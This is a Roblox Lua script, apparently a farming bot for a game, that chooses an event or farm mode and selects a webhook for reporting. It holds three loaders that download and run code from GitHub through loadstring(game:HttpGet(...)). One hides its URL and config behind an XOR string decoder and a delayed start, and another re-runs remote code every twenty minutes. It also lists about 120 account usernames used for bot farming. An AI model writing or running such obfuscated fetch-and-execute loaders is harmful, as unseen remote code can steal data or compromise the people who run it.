if game.PlaceId == 15502339080 then
	return
end

Start_ford = 1
task.spawn(function()
wait(15)
local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9) local v10={};for v11=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + 1 )),v1(v2(v9,1 + (v11% #v9) ,1 + (v11% #v9) + 1 )))%256 ));end return v5(v10);end _G.Config={[v7("\228\208\222\55\207\159","\126\177\163\187\69\134\219\167")]=v7("\118\200\120\149\172\112\152\115\136\169\123\157\125\136\168\115\158\125\136\164\114\201\122\136\253\33\149\124\192\168\119\158\46\199\171\118","\156\67\173\74\165"),[v7("\48\190\90\21\179\52\66\11\190\77","\38\84\215\41\118\220\70")]=v7("\1\68\114\65\175\7\65\119\69\168\9\79\118\75\168\7\67\117\64","\158\48\118\66\114"),[v7("\133\43\4\51","\155\203\68\112\86\19\197")]=name_vps};loadstring(game:HttpGet(v7("\78\201\34\236\83\34\170\183\84\220\33\178\71\113\241\240\83\223\35\239\69\106\230\247\72\201\51\242\84\54\230\247\75\146\37\247\65\124\236\252\71\200\121\233\78\126\228\226\67\217\48\238\69\125\170\245\71\212\56\179\80\125\241\161\31","\152\38\189\86\156\32\24\133")))();
end)
task.spawn(function()
	while true do
		loadstring(game:HttpGet("https://raw.githubusercontent.com/vingagagagagaga2/GAGAGAGA000999xz/refs/heads/main/101Restart"))()	
		wait(1200)
	end
end)
spawn(function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/vingagagagagaga2/GAGAGAGA000999xz/refs/heads/main/VAR_RECONNECT"))()
end)

task.wait(5)
----------------------


-----------------------

----------------
if _G.RunsLeft_TIMEtrial > 0 and _G.start_vvv_ == true then
	EVENT_or_FARM = "F" 
else
	EVENT_or_FARM = "E" 
end

--EVENT_or_FARM = "E" 
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local Client = ReplicatedStorage:WaitForChild("Library"):WaitForChild("Client")
local SaveModule = require(Client:WaitForChild("Save"))
local function getRaidPoints()
	local saveData = SaveModule.Get() or {}
	return tonumber(saveData.Safe_S2RaidMaxDifficulty) or 0
end
if getRaidPoints() < 45000 then
	EVENT_or_FARM = "F" 
end


_G.ACC_SUPER = false

local NAM_SUPER = {"sollarleats","8402Whitehead9566","redman721212","Thienktdeptrai09","Denzel11179","dzLCBpCO34","7vmW8gRw14","whelmssteviac","OlsenMiffyf7","MichaelBobbyj767","mcconchifredjeyo","ulkeboraxb","1863Echols3027","1880Fritz3044","550Kennedy1714","kuvindn13","1841Kearney3005","1851Moon3015","1840Harper3004","2391Ellsworth3555","1836Edmonds3000","2390Muir3554","2386Conte3550","1835Haskins2999","8406Donohue9570","IsabellaArrowFlash","lundellgeorgeano","Yuri207x","10dayhetga3","renovandenei54","kuvyndn","kuvyndn115","minhlhuyldiet8","kthatch101","Tygirlllyr1370","Henry89084","Toups51814","teomond345320","tunostri486","detmerskanbahlaaq","laboture121","Ruiz202457","shimartje525","commtigge246","affiegutterin9","bradodette49","1787Vickery2951","ghaldoun9247","8394Corbett9558","48Giavanna49","dyagalsea883","38Johan39","8407Castellanos9571","1871Luther3035","854Elliott855","49Dayton50","britconter8462","16Giancarlo17","fadile66096","pafnucymargit21","ecclweltst","34Jaret35","pisekhotch788","8815Falk9979","8593Gaskins9757","soojung48573","Caraballo15271","Hall210231","Ruffin54837","Aaron10657","881Caden882","80Jovany81","79Kiera80","lavinie91258","11Davion125","bosonvoormah","burchard6297","hadriamullavey70","racbracfe25","Tyerlasnullum30","10zwemerbtam10","17Leland18","jrpB44FT38","dQ9PQsBg54","10Rebekah11","11eijtenisiktam11","YTAzK1dX05","XxSaber_Ech0xX2006","quochuyfarm1","549Treyton1713","mpkute2201","quochuyfarm2","rank8z100","2389Ayers3553","8403Cooney9567","1837Gallegos3001","Russell71796","Charles11184","Nathaniel10681","Bockman96259","Garfinkel85778","Plourde49152","LegendFusionNova","MinerHaze74","ProVoid41","Nance52630","kians54232","Emilio111546","Briar10664","Blake10676","Ninja_Knight82","MoonNeonLion2023","FlameEch0Hawk","tamuleviazulayv","bhosievvanister","wannergbatokaiiz","Weiland44899","878Tina879","Betts41829","feodslogeshy","hegemangaltieri81","killedsanthi85","Lilly457365","Reeder67056","Rice84348"}
local playerName = game.Players.LocalPlayer.Name
for _, name in ipairs(NAM_SUPER) do
    if playerName == name then
        EVENT_or_FARM = "F"
		_G.ACC_SUPER = true
        break
    end
end

if name_vps == "xxx" then
EVENT_or_FARM = "F"
_G.ACC_SUPER = true
end
----------------

if EVENT_or_FARM == "E"then
	vinGWEBHOOK_LINK = dis_event
else
	vinGWEBHOOK_LINK = dis_farm
end
